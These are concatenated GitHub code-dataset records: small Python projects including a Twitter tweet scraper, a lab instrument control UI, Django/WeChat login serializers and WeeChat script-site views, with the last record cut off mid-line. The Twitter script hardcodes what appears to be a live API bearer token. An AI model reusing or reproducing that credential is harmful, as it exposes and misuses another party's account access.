\"task\": \"apps.delivery.tasks.task_process_periodically_add_patches\",\n \"schedule\": crontab(hour=\"4\", minute=0),\n },\n \"sample_task\": {\"task\": \"apps.delivery.tasks.sample_task\", \"schedule\": crontab(minute=\"*/1\"),},\n}\n","repo_name":"abodacs/django-fullstack-biolerplate","sub_path":"backend/onlineBenevolent/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"48411100767","text":"# This is a sample Python script.\n\nimport csv\nfrom math import floor\n\n\ndef quarter1(list, week):\n LEN = len(list)\n if LEN % 2 == 0:\n med = quarter2(list[0: int(LEN / 2)], week)\n else:\n med = quarter2(list[0: int(floor(LEN / 2))], week)\n return med\n\n\n# This is equivalent to median\ndef quarter2(list, week):\n LEN = len(list)\n if LEN % 2 == 0:\n med = .5 * (list[int(LEN / 2) - 1][f'Week {week}'] + list[int(LEN / 2)][f'Week {week}'])\n else:\n med = list[int(floor(LEN / 2))][f'Week {week}']\n return med\n\n\ndef quarter3(list, week):\n LEN = len(list)\n if LEN % 2 == 0:\n med = quarter2(list[int(LEN / 2): LEN], week)\n else:\n med = quarter2(list[int((LEN / 2)): LEN], week)\n return med\n\n\ndef tukey_range(Q1, Q3):\n return [Q1 - 1.5 * (Q3 - Q1), Q3 + 1.5 * (Q3 - Q1)]\n\n\ndef print_participants_in_order(out_of_order, in_order, week):\n for p1 in in_order:\n for p2 in out_of_order:\n if p1.get('Name') == p2.get('Name'):\n print(\"\\t{} {}\".format(p1.get('Name'), p1.get(f'Week {str(week)}')))\n\n\nif __name__ == '__main__':\n participants = []\n with open('participants.csv', 'r', newline='') as participants_file:\n reader = csv.DictReader(participants_file)\n for row in reader:\n participants.append({'Name': row['Name'], 'Week 1': float(row['Week 1']), 'Week 2': float(row['Week 2']),\n 'Week 3': float(row['Week 3'])})\n\n original_participant_list = participants\n for week in range(1, 4):\n sorted_list = sorted(participants, key=lambda k: k[f'Week {week}'])\n print(f'Week: {week}')\n print(f'Q1: {quarter1(sorted_list, week)}')\n print(f'Q2: {quarter2(sorted_list, week)}')\n print(f'Q3: {quarter3(sorted_list, week)}')\n print(f'Tukey\\'s Range: {tukey_range(quarter1(sorted_list, week), quarter3(sorted_list, week))}')\n print(f'Outliers:')\n outliers = []\n for participant in sorted_list:\n if participant[f'Week {week}'] < tukey_range(quarter1(sorted_list, week), quarter3(sorted_list, week))[0]:\n outliers.append(participant)\n print_participants_in_order(outliers, original_participant_list, week)\n\n print()\n","repo_name":"gjclark14/MachineLearningProject1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32796326025","text":"import requests\nimport os\nimport json\nimport sqlite3\nfrom sqlite3 import Error\nimport time\nimport random\n\n# To set your enviornment variables in your terminal run the following line:\n# export 'BEARER_TOKEN'='<your_bearer_token>'\n\ntoken = \"AAAAAAAAAAAAAAAAAAAAAN9cJQEAAAAAVr3OCBek5GZit3lRVnl7vEtkO2k%3DE9cuhlYwNv0YM7Kn20f1lWoWuVpp90BOVpAfa5rVWYDTAhumxL\"\n\n\n\ndef auth():\n return token\n\n\ndef create_url(ids):\n tweet_fields = \"tweet.fields=text,created_at,geo,lang,author_id\"\n # Tweet fields are adjustable.\n # Options include:\n # attachments, author_id, context_annotations,\n # conversation_id, created_at, entities, geo, id,\n # in_reply_to_user_id, lang, non_public_metrics, organic_metrics,\n # possibly_sensitive, promoted_metrics, public_metrics, referenced_tweets,\n # source, text, and withheld\n ids = \"ids=\"+\",\".join(ids)\n # You can adjust ids to include a single Tweets.\n # Or you can add to up to 100 comma-separated IDs\n url = \"https://api.twitter.com/2/tweets?{}&{}\".format(ids, tweet_fields)\n return url\n\n\ndef create_headers(bearer_token):\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n\ndef connect_to_endpoint(url, headers):\n response = requests.request(\"GET\", url, headers=headers)\n print(response.status_code)\n if response.status_code != 200:\n raise Exception(\n \"Request returned an error: {} {}\".format(\n response.status_code, response.text\n )\n )\n return response.json()\n\ndef add_tweet(conn, tweet):\n \"\"\"\n Create a new equity_line into the utils_data_logs_equity table\n :param conn:\n :param equity_line:\n :return: equity_line id\n \"\"\"\n sql = ''' INSERT INTO tweet_db(place,tweet_id,author_id,text,geo,lang,created_at)\n VALUES(?,?,?,?,?,?,?) '''\n cur = conn.cursor()\n cur.execute(sql, tweet)\n conn.commit()\n return cur.lastrowid\n\ndef divide_chunks(l, n): \n for i in range(0, len(l), n): \n yield l[i:i + n] \n \n\ndef main():\n # ids = open('2016-pres-geo.txt').readlines()\n # writer = open(\"2016-pres-geo-2M.txt\", 'w+')\n # existing_ids = open(\"2016-pres-geo-1M.txt\").readlines()\n # existing_ids = [i.strip() for i in existing_ids]\n # ids = [i.strip() for i in ids]\n # print(len(ids))\n # #ids = [i for i in ids if i not in existing_ids]\n # print(len(ids))\n # x = 0\n # while x < 1000000:\n # curr_id = random.choice(ids)\n # if curr_id not in existing_ids:\n # writer.write(curr_id + '\\n')\n # x += 1\n # if x%100 == 0:\n # print(x)\n\n bearer_token = auth()\n ids = open('2020-pres-geo.txt').readlines()\n ids = [i.strip() for i in ids]\n indexes = range(len(ids))\n indexes_index = 0\n con = sqlite3.connect(r'tweet2020.sqlite3')\n ids = list(divide_chunks(ids, 100))\n total = len(ids)\n for index, tweets in enumerate(ids):\n starttime = time.time()\n url = create_url(tweets)\n headers = create_headers(bearer_token)\n json_response = connect_to_endpoint(url, headers)\n data = json.loads(json.dumps(json_response, indent=4, sort_keys=True))\n data = data['data']\n for item in data:\n geo = None\n author_id = None\n created_at = None\n tweet_id = None\n lang = None\n text = None\n try:\n geo = item['geo']['place_id']\n except:\n geo = None\n try:\n author_id = item['author_id']\n except:\n author_id = None\n try:\n created_at = item['created_at']\n except:\n created_at = None\n try:\n tweet_id = item['id']\n except:\n tweet_id = None\n try:\n lang = item['lang']\n except:\n lang = None\n try:\n text = item['text']\n except:\n text = None\n tweet_data = [indexes[indexes_index],tweet_id, author_id, text, geo, lang, created_at]\n indexes_index += 1\n add_tweet(con, tweet_data)\n if 3 - ((time.time() - starttime) % 60.0) <= 0:\n continue\n else:\n time.sleep(3 - ((time.time() - starttime) % 60.0))\n print(index, \" out of \", total)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","repo_name":"CharlieRay668/SRScode","sub_path":"twitterapi.py","file_name":"twitterapi.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39149454978","text":"from control import Ui_MainWindow\nfrom PyQt5 import QtWidgets, QtCore\n\nimport sys, esp300, gauss460, time\n\nimport numpy as np\n\nfrom time import sleep\n\nclass RobotControl(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n super(RobotControl, self).setupUi(self)\n\n self.esp = esp300.esp300(1,0)\n self.gauss = gauss460.gauss460(8,1)\n\n self.scanning = False\n\n pos_updater = QtCore.QTimer(self)\n\n def update():\n if not self.scanning:\n self.a1_pos.setText(str(self.esp.axis1.pos) + \" mm\")\n self.a2_pos.setText(str(self.esp.axis2.pos) + \" mm\")\n self.a3_pos.setText(str(self.esp.axis3.pos) + \" mm\")\n\n field = self.gauss.allf()\n\n self.x_val.setText(str(field[0]))\n self.y_val.setText(str(field[1]))\n self.z_val.setText(str(field[2]))\n self.mag_val.setText(str(field[3]))\n\n pos_updater.timeout.connect(update)\n pos_updater.start(100)\n\n # Axis 1 Controls\n\n self.a1_left.clicked.connect(\n lambda _: setattr(self.esp.axis1, 'pos', self.esp.axis1.pos - self.a1_step.value())\n )\n self.a1_right.clicked.connect(\n lambda _: setattr(self.esp.axis1, 'pos', self.esp.axis1.pos + self.a1_step.value())\n )\n self.a1_zero.clicked.connect(\n lambda _: self.esp.axis1.go_home()\n )\n\n # Axis 2 Controls\n\n self.a2_left.clicked.connect(\n lambda _: setattr(self.esp.axis2, 'pos', self.esp.axis2.pos - self.a2_step.value())\n )\n self.a2_right.clicked.connect(\n lambda _: setattr(self.esp.axis2, 'pos', self.esp.axis2.pos + self.a2_step.value())\n )\n self.a2_zero.clicked.connect(\n lambda _: self.esp.axis2.go_home()\n )\n\n # Axis 3 Controls\n\n self.a3_left.clicked.connect(\n lambda _: setattr(self.esp.axis3, 'pos', self.esp.axis3.pos - self.a3_step.value())\n )\n self.a3_right.clicked.connect(\n lambda _: setattr(self.esp.axis3, 'pos', self.esp.axis3.pos + self.a3_step.value())\n )\n self.a3_zero.clicked.connect(\n lambda _: self.esp.axis3.go_home()\n )\n\n self.auto_savedir_button.clicked.connect(self.set_savedir)\n\n def scan():\n if self.quantity_combo.currentText() == \"Gradient\":\n self.scan_volume_gradient()\n elif self.quantity_combo.currentText() == \"Field\":\n self.scan_volume_field() \n self.auto_scan.clicked.connect(scan)\n\n def set_savedir(self):\n self.fn = str(QtWidgets.QFileDialog.getExistingDirectory(self, \"Select Directory\"))\n self.auto_savedir.setText(self.fn)\n\n def scan_volume_gradient(self):\n self.scanning = True\n\n dim1 = int((abs(self.a1_max.value() - self.a1_min.value()))/ self.a1_step.value())\n dim2 = int((abs(self.a2_max.value() - self.a2_min.value()))/ self.a2_step.value())\n dim3 = int((abs(self.a3_max.value() - self.a3_min.value()))/ self.a3_step.value())\n\n grad_mag = np.zeros((dim1+1,dim2+1,dim3+1))\n i=0\n j=0\n k=0\n\n for x in np.linspace(self.a1_min.value(), self.a1_max.value(), num=dim1+1):\n j=0\n for y in np.linspace(self.a2_min.value(), self.a2_max.value(), num=dim2+1):\n k=0\n for z in np.linspace(self.a3_min.value(), self.a3_max.value(), num=dim3+1):\n try:\n x_grad = []\n y_grad = []\n z_grad = []\n\n grad = []\n\n self.esp.axis1.pos = x\n self.esp.axis2.pos = y\n self.esp.axis3.pos = z\n\n self.esp.axis1.pos = x - self.a1_step.value()\n x_grad.append(self.gauss.field)\n self.esp.axis1.pos = x + self.a1_step.value()\n x_grad.append(self.gauss.field)\n self.esp.axis1.pos = x\n\n grad.append((x_grad[1] - x_grad[0])/(2*(self.a1_step.value()*1e-3)))\n\n self.esp.axis2.pos = y - self.a2_step.value()\n y_grad.append(self.gauss.field)\n self.esp.axis2.pos = y + self.a2_step.value()\n y_grad.append(self.gauss.field)\n self.esp.axis2.pos = y\n\n grad.append((y_grad[1]-y_grad[0])/(2*(self.a2_step.value()*1e-3)))\n\n self.esp.axis3.pos = z - self.a3_step.value()\n z_grad.append(self.gauss.field)\n self.esp.axis3.pos = z + self.a3_step.value()\n z_grad.append(self.gauss.field)\n self.esp.axis3.pos = z\n\n grad.append((z_grad[1]-z_grad[0])/(2*(self.a3_step.value()*1e-3)))\n\n grad_mag[i,j,k] = np.sqrt(grad[0]**2+grad[1]**2+grad[2]**2)\n except Exception as ex:\n print(\"Caught an error, skipping point\")\n print(ex)\n np.save(self.fn + \"/grad.errbak\",grad_mag)\n\n k+=1\n j+=1\n i+=1\n\n np.save(self.fn + \"/grad\",grad_mag)\n\n self.scanning = False\n\n def scan_volume_field(self):\n self.scanning = True\n\n dim1 = int((abs(self.a1_max.value() - self.a1_min.value()))/ self.a1_step.value())\n dim2 = int((abs(self.a2_max.value() - self.a2_min.value()))/ self.a2_step.value())\n dim3 = int((abs(self.a3_max.value() - self.a3_min.value()))/ self.a3_step.value())\n\n x_mag = np.zeros((dim1+1,dim2+1,dim3+1))\n y_mag = np.zeros((dim1+1, dim2+1, dim3+1))\n z_mag = np.zeros((dim1+1, dim2+1, dim3+1))\n i=0\n j=0\n k=0\n\n for x in np.linspace(self.a1_min.value(), self.a1_max.value(), num=dim1+1):\n j=0\n for y in np.linspace(self.a2_min.value(), self.a2_max.value(), num=dim2+1):\n k=0\n for z in np.linspace(self.a3_min.value(), self.a3_max.value(), num=dim3+1):\n x_grad = []\n y_grad = []\n z_grad = []\n\n grad = []\n\n self.esp.axis1.pos = x\n sleep(0.4)\n self.esp.axis2.pos = y\n sleep(0.4)\n self.esp.axis3.pos = z\n sleep(1.0)\n\n allf = self.gauss.allf()\n\n x_mag[i,j,k] = allf[0]\n y_mag[i,j,k] = allf[1]\n z_mag[i,j,k] = allf[2]\n\n k+=1\n j+=1\n np.save(self.fn + \"/xfield\",x_mag)\n np.save(self.fn + \"/yfield\",y_mag)\n np.save(self.fn + \"/zfield\",z_mag)\n i+=1\n\n np.save(self.fn + \"/xfield\",x_mag)\n np.save(self.fn + \"/yfield\",y_mag)\n np.save(self.fn + \"/zfield\",z_mag)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n aw = RobotControl()\n\n aw.show()\n sys.exit(app.exec_())\n","repo_name":"gcassella/field-mapper","sub_path":"UI/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5946088343","text":"import pickle\nfrom dataclasses import dataclass, field\nfrom typing import Dict, Counter, List\n\n\n@dataclass\nclass Vocabulary:\n token_to_id: Dict = field(default_factory=dict)\n type_to_id: Dict = field(default_factory=dict)\n label_to_id: Dict = field(default_factory=dict)\n\n def add_from_counter(\n self, target_field: str, counter: Counter, n_most_values: int = -1, add_values: List[str] = None,\n ):\n if not hasattr(self, target_field):\n raise ValueError(f\"There is no {target_field} attribute in vocabulary class\")\n if add_values is None:\n add_values = []\n if n_most_values == -1:\n add_values += list(zip(*counter.most_common()))[0]\n else:\n add_values += list(zip(*counter.most_common(n_most_values - len(add_values))))[0]\n attr = {value: i for i, value in enumerate(add_values)}\n setattr(self, target_field, attr)\n\n def dump(self, path: str):\n with open(path, \"wb\") as pickle_file:\n pickle.dump(\n {\"token_to_id\": self.token_to_id, \"type_to_id\": self.type_to_id, \"label_to_id\": self.label_to_id},\n pickle_file,\n )\n\n @staticmethod\n def load(path: str):\n with open(path, \"rb\") as pickle_file:\n data = pickle.load(pickle_file)\n if not isinstance(data, dict) and not all([k in data for k in [\"token_to_id\", \"type_to_id\", \"label_to_id\"]]):\n raise RuntimeError(\"Incorrect data inside pickled file\")\n return Vocabulary(**data)\n","repo_name":"bzz/code2seq-pyTorch","sub_path":"dataset/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"37105286316","text":"from board import Board\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import ScoreBoard\nimport time\n\nboard = Board()\nboard.turn_off_tracer()\nright_paddle = Paddle(350,0)\nleft_paddle = Paddle(-350,0)\nball = Ball()\nscoreboard = ScoreBoard()\n\nboard.listen_for_key()\nboard.on_key(right_paddle.up, 'Up')\nboard.on_key(right_paddle.down, 'Down')\nboard.on_key(left_paddle.up, 'w')\nboard.on_key(left_paddle.down, 'a')\ngame_on = True\n\nwhile game_on:\n \n time.sleep(0.1)\n board.update_screen()\n ball.move_ball()\n \n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n ball.speed_up()\n \n if ball.distance(right_paddle) < 50 and ball.xcor() > 320 or ball.distance(left_paddle) < 50 and ball.xcor() < -320:\n ball.bounce_x()\n ball.speed_up()\n \n if ball.xcor() < -380:\n ball.reset()\n scoreboard.l_point()\n \n \n if ball.xcor() > 380:\n ball.reset()\n scoreboard.r_point()\n \n\nboard.exit_screen()","repo_name":"mattshakespeare/100_days_of_code","sub_path":"pong_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6101126557","text":"from collections import deque\ndef dfs(array,visited):\n dx = [-1,0,1,0]\n dy = [0,-1,0,1]\n q = deque()\n q.append([0,0])\n visited[0][0] = 1\n while(q):\n x,y = q.popleft()\n for i in range(4):\n ddx = x + dx[i]\n ddy = y + dy[i]\n if ddx < 0 or ddx>=len(array) or ddy <0 or ddy >= len(array[0]):\n continue\n elif visited[ddx][ddy] != -1:\n continue\n elif array[ddx][ddy] == 0:\n continue\n else:\n q.append([ddx,ddy])\n visited[ddx][ddy] = visited[x][y] + 1\n\n return visited\ndef solution(maps):\n visited = [[-1]*len(maps[0]) for _ in range(len(maps))]\n answer = dfs(maps, visited)\n if answer[-1][-1] == 1:\n return -1\n else:\n return answer[-1][-1]","repo_name":"yujeonghyeop/progrramers","sub_path":"Level2/Level2.gamemap/gamemap.py","file_name":"gamemap.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32947275306","text":"print('\\nWELCOME MY PROGRAMM !!!')\n# n=0\n# while True:\n# kalit=input('Malumotlarimga kirish uchun kalit: ')\n# if kalit!='Bobur':\n# n+=1\n# if kalit=='BOBUR' and n!=3:\n# oilam={\n# 'Dadam' : \"ismi Rashid yoshi 42 Xorazim viloyatida tug'ilgan \",\n# 'Onam' : \"ismi Adolat yoshi 40 Xorazim viloyatida tug'ilgan \",\n# 'Ukam' : \"ismi Bunyod yoshi 16 Xorazim viloyatida tug'ilgan \"\n# }\n# malumot=input('Kim haqda: ')\n# if malumot in oilam:\n# print(oilam[malumot])\n# elif n!=3:\n# continue\n# else:\n# break\n\n\nprint('Malumot o\\'rnida !!!\\n0: tugatish\\n1: o\\'ynash\\n2: malumot qo\\'shish\\n3: malumot o\\'chirish\\n4: qidirish')\ntaomlar=['osh','chuchvara','do\\'lma','kabob','no\\'xot','makaron']\nodamlar=['Samandar','Aka','Habibullo','Bobur','Azizbek','Nodir']\nt_o={}\nfor i in range(len(odamlar)):\n t_o[odamlar[i]]=taomlar[i]\nwhile True:\n kalit=int(input('Nima buyurasiz: '))\n if kalit==0:\n break\n elif kalit==1:\n for i in odamlar:\n print(t_o[i])\n elif kalit==2:\n n=int(input('malumotlar soni: '))\n for i in range(n):\n a=input('kalitini kiriting: ')\n b=input('malumotni kiriting: ')\n odamlar.append(a)\n taomlar.append(b)\n t_o[a]=b\n elif kalit==3:\n m=int(input('malumotlar soni: '))\n if m<=len(odamlar):\n for i in range(m):\n malumot=input('kalitini kiriting: ')\n if malumot in odamlar:\n odamlar.remove(malumot)\n taomlar.remove(t_o[malumot]) \n del t_o[malumot]\n else:\n print('ERROR ???')\n elif kalit==4:\n kalit2=input('Qidirayotgan malumotizzi kaliti: ')\n if kalit2 in t_o:\n print(t_o[kalit2])\n else:\n print('uzur janob bizda bu xaqda malumot yoq ???')\n else:\n print('ERROR ???')\n \n\n\n\n","repo_name":"BOLAKAY0144/malumotlar_kirim_chiqim","sub_path":"dastur1.py","file_name":"dastur1.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20678338710","text":"import json\nfrom datetime import datetime\n\nfrom django.contrib.auth import authenticate\nfrom rest_framework import serializers\nfrom rest_framework_jwt.settings import api_settings\n\nfrom users.models import Users, WechatUser\nfrom utils.wechat_sdk import wechat_login\n\njwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\njwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\njwt_decode_handler = api_settings.JWT_DECODE_HANDLER\njwt_get_username_from_payload = api_settings.JWT_PAYLOAD_GET_USERNAME_HANDLER\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Users\n fields = ('id', 'username', 'mobile', 'email', 'avatar', 'nickname', 'is_employee')\n\n\nclass LoginSerializer(serializers.Serializer):\n\n username = serializers.CharField(write_only=True, required=True, allow_null=False)\n password = serializers.CharField(write_only=True, required=True, allow_null=False)\n\n def validate(self, validated_data):\n user = authenticate(**validated_data)\n\n if not user:\n raise serializers.ValidationError('账���或密码错误!')\n else:\n if not user.is_active:\n raise serializers.ValidationError('账号已禁用!')\n\n payload = jwt_payload_handler(user)\n user.last_login = datetime.now()\n user.save()\n\n return {\n \"token\": jwt_encode_handler(payload),\n \"user\": user\n }\n\n\nclass WechatLoginSerializer(serializers.Serializer):\n\n code = serializers.CharField(write_only=True)\n\n def create(self, validated_data):\n js_code = validated_data.pop('code')\n\n status_code, result = wechat_login.code2session(js_code)\n\n if status_code != 200:\n raise serializers.ValidationError('微信获取openid失败')\n\n result = json.loads(result)\n wechat_user = WechatUser.objects.filter(openid=result['openid']).first()\n if wechat_user and wechat_user.user:\n # 签发token\n user = wechat_user.user\n payload = jwt_payload_handler(user)\n token = jwt_encode_handler(payload)\n validated_data['token'] = token\n if wechat_user and not wechat_user.user:\n validated_data['openid'] = result['openid'] # 严格来说是需要使用session_key加密openid,这里偷懒明文传输\n else:\n wechat_user = WechatUser(openid=result['openid'], session_key=result['session_key'])\n wechat_user.save()\n validated_data['openid'] = result['openid']\n self.context['view'].validated_data = validated_data\n return wechat_user\n\n\nclass WechatRegisterSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n code = serializers.CharField(write_only=True)\n openid = serializers.CharField(write_only=True)\n\n def create(self, validated_data):\n code = validated_data.pop('code')\n openid = validated_data.pop('openid')\n result = wechat_login.get_phone_number(code)\n if result.get('errcode') != 0:\n raise serializers.ValidationError('微信获取手机号失败。')\n\n validated_data['mobile'] = result['phone_info']['purePhoneNumber']\n user = super(WechatRegisterSerializer, self).create(validated_data)\n WechatUser.objects.filter(openid=openid).update(user=user)\n\n # 签发token\n payload = jwt_payload_handler(user)\n token = jwt_encode_handler(payload)\n validated_data['token'] = token\n self.context['view'].validated_data = validated_data\n return user\n\n class Meta:\n model = Users\n fields = ('id', 'nickname', 'avatar', 'code', 'openid')\n","repo_name":"WytheLi/laijinguozi-server","sub_path":"apps/users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"24141533482","text":"from datetime import datetime\nfrom pygments import highlight\nfrom pygments.formatters import HtmlFormatter\nfrom pygments.lexers import get_lexer_by_name\n\nfrom django.conf import settings\nfrom django.core.mail import EmailMessage\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404\n\nfrom weechat.common.path import files_path_join\nfrom weechat.download.models import Release\nfrom weechat.scripts.models import (\n Script,\n ScriptFormAdd,\n ScriptFormUpdate,\n get_language_from_extension,\n)\n\n# list of keys that are sorted by default using descending order\nKEY_ORDER_BY_DESC = (\n 'popularity',\n 'min_weechat',\n 'max_weechat',\n 'added',\n 'updated',\n)\n\nPYGMENTS_LEXER = {\n 'pl': 'perl',\n 'py': 'python',\n 'rb': 'ruby',\n 'lua': 'lua',\n 'tcl': 'tcl',\n 'scm': 'scheme',\n 'js': 'javascript',\n 'php': 'php',\n}\n\n\ndef get_sort_key(sort_key):\n \"\"\"Get sort keys to sort scripts (in SQL request).\"\"\"\n keys = sort_key.split(',')\n if 'name' not in keys:\n keys.append('name')\n for i, key in enumerate(keys):\n if key in KEY_ORDER_BY_DESC:\n keys[i] = f'-{key}'\n return keys\n\n\ndef get_highlighted_source(source, language):\n \"\"\"Get source highlighted with pygments.\"\"\"\n return highlight(source,\n get_lexer_by_name(language, stripnl=True,\n encoding='utf-8'),\n HtmlFormatter(cssclass='pygments', linenos='table'))\n\n\ndef scripts(request, sort_key='popularity', filter_name='', filter_value=''):\n \"\"\"Page with list of scripts.\"\"\"\n # pylint: disable=too-many-locals,too-many-branches\n\n def sort_by_popularity(item):\n return (-1 * item[1], item[0].lower())\n\n def sort_by_name(item):\n return item[0].lower()\n\n script_list = (Script.objects.filter(approved=True)\n .order_by(*get_sort_key(sort_key)))\n if filter_name == 'tag':\n script_list = (script_list\n .filter(tags__regex=rf'(^|,){filter_value}($|,)'))\n elif filter_name == 'language':\n if filter_value == 'python2-compatible':\n script_list = (script_list\n .filter(language='python')\n .filter(tags__regex=r'(^|,)py2($|,)'))\n elif filter_value == 'python2-only':\n script_list = (script_list\n .filter(language='python')\n .exclude(tags__regex=r'(^|,)py3($|,)'))\n elif filter_value == 'python3-compatible':\n script_list = (script_list\n .filter(language='python')\n .filter(tags__regex=r'(^|,)py3($|,)'))\n elif filter_value == 'python3-only':\n script_list = (script_list\n .filter(language='python')\n .exclude(tags__regex=r'(^|,)py2($|,)'))\n else:\n script_list = script_list.filter(language=filter_value)\n elif filter_name == 'license':\n script_list = script_list.filter(license=filter_value)\n elif filter_name == 'author':\n script_list = script_list.filter(author=filter_value)\n languages = {}\n licenses = {}\n tags = {}\n for script in script_list:\n languages[script.language] = languages.get(script.language, 0) + 1\n if script.language == 'python':\n py2_ok = script.is_py2_ok()\n py3_ok = script.is_py3_ok()\n if py2_ok:\n languages['python2-compatible'] = \\\n languages.get('python2-compatible', 0) + 1\n if not py3_ok:\n languages['python2-only'] = \\\n languages.get('python2-only', 0) + 1\n if py3_ok:\n languages['python3-compatible'] = \\\n languages.get('python3-compatible', 0) + 1\n if not py2_ok:\n languages['python3-only'] = \\\n languages.get('python3-only', 0) + 1\n licenses[script.license] = licenses.get(script.license, 0) + 1\n if script.tags:\n for tag in script.tagslist():\n tags[tag] = tags.get(tag, 0) + 1\n script_filters_displayed, script_filters_sort = (\n request.COOKIES.get('script_filters', '0_name').split('_'))\n if script_filters_sort == 'popularity':\n sort_function = sort_by_popularity\n else:\n sort_function = sort_by_name\n return render(\n request,\n 'scripts/list.html',\n {\n 'script_list': script_list,\n 'sort_key': sort_key,\n 'filter_name': filter_name,\n 'filter_value': filter_value,\n 'script_filters_displayed': int(script_filters_displayed),\n 'script_filters_sort': script_filters_sort,\n 'languages': sorted(languages.items(), key=sort_function),\n 'licenses': sorted(licenses.items(), key=sort_function),\n 'tags': sorted(tags.items(), key=sort_function),\n },\n )\n\n\ndef script_source(request, scriptid='', scriptname=''):\n \"\"\"Page with source of a script.\"\"\"\n script = None\n if scriptid:\n script = get_object_or_404(Script, id=scriptid)\n try:\n with open(files_path_join(script.path(),\n script.name_with_extension()),\n 'rb') as _file:\n htmlsource = get_highlighted_source(_file.read(),\n script.language)\n except: # noqa: E722 pylint: disable=bare-except\n raise Http404\n else:\n sname = scriptname\n sext = ''\n pos = sname.rfind('.')\n if pos > 0:\n sext = sname[pos+1:]\n sname = sname[0:pos]\n script = get_object_or_404(\n Script,\n name=sname,\n language=get_language_from_extension(sext),\n )\n try:\n with open(files_path_join(script.path(),\n script.name_with_extension()),\n 'rb') as _file:\n htmlsource = get_highlighted_source(_file.read(),\n PYGMENTS_LEXER[sext])\n except: # noqa: E722 pylint: disable=bare-except\n raise Http404\n return render(\n request,\n 'scripts/source.html',\n {\n 'script': script,\n 'htmlsource': htmlsource,\n },\n )\n\n\ndef get_script_content(script_file):\n \"\"\"Get content of script file (replace \"\\r\\n\" by \"\\n\").\"\"\"\n content = script_file.read()\n if isinstance(content, bytes):\n content = content.decode('utf-8')\n return content.replace('\\r\\n', '\\n')\n\n\ndef form_add(request):\n \"\"\"Page with form to add a script.\"\"\"\n if request.method == 'POST':\n form = ScriptFormAdd(request.POST, request.FILES)\n if form.is_valid():\n scriptfile = request.FILES['file']\n\n # add script in database\n now = datetime.now()\n script = Script(approved=False,\n popularity=0,\n name=form.cleaned_data['name'],\n version=form.cleaned_data['version'],\n url='',\n language=form.cleaned_data['language'],\n license=form.cleaned_data['license'],\n desc_en=form.cleaned_data['description'],\n requirements=form.cleaned_data['requirements'],\n min_weechat=form.cleaned_data['min_weechat'],\n author=form.cleaned_data['author'],\n mail=form.cleaned_data['mail'],\n added=now,\n updated=now)\n\n # write script in pending directory\n filename = files_path_join('scripts', 'pending1',\n script.name_with_extension())\n with open(filename, 'w') as _file:\n _file.write(get_script_content(scriptfile))\n\n # send e-mail\n try:\n subject = f'WeeChat: new script {script.name_with_extension()}'\n sender = (f'{form.cleaned_data[\"author\"]} '\n f'<{form.cleaned_data[\"mail\"]}>')\n body = (f'Script : {form.cleaned_data[\"name\"]}\\n'\n f'Version : {form.cleaned_data[\"version\"]}\\n'\n f'Language : {form.cleaned_data[\"language\"]}\\n'\n f'License : {form.cleaned_data[\"license\"]}\\n'\n f'Description : {form.cleaned_data[\"description\"]}\\n'\n f'Requirements: {form.cleaned_data[\"requirements\"]}\\n'\n f'Min WeeChat : {form.cleaned_data[\"min_weechat\"]}\\n'\n f'Author : {sender}>\\n'\n f'\\n'\n f'Comment:\\n{form.cleaned_data[\"comment\"]}\\n')\n email = EmailMessage(subject, body, sender,\n settings.SCRIPTS_MAILTO)\n email.attach_file(filename)\n email.send()\n except: # noqa: E722 pylint: disable=bare-except\n return HttpResponseRedirect('/scripts/adderror/')\n\n # save script in database\n script.save()\n\n return HttpResponseRedirect('/scripts/addok/')\n else:\n form = ScriptFormAdd()\n return render(\n request,\n 'scripts/add.html',\n {\n 'form': form,\n },\n )\n\n\ndef form_update(request):\n \"\"\"Page with form to update a script.\"\"\"\n if request.method == 'POST':\n form = ScriptFormUpdate(request.POST, request.FILES)\n if form.is_valid():\n scriptfile = request.FILES['file']\n script = Script.objects.get(id=form.cleaned_data['script'])\n\n # send e-mail\n try:\n subject = (f'WeeChat: new release for script '\n f'{script.name_with_extension()}')\n sender = (f'{form.cleaned_data[\"author\"]} '\n f'<{form.cleaned_data[\"mail\"]}>')\n body = (f'Script : {script.name_with_extension()} '\n f'({script.version_weechat()})\\n'\n f'New version: {form.cleaned_data[\"version\"]}\\n'\n f'Author : {sender}\\n'\n f'\\n'\n f'Comment:\\n{form.cleaned_data[\"comment\"]}\\n')\n email = EmailMessage(subject, body, 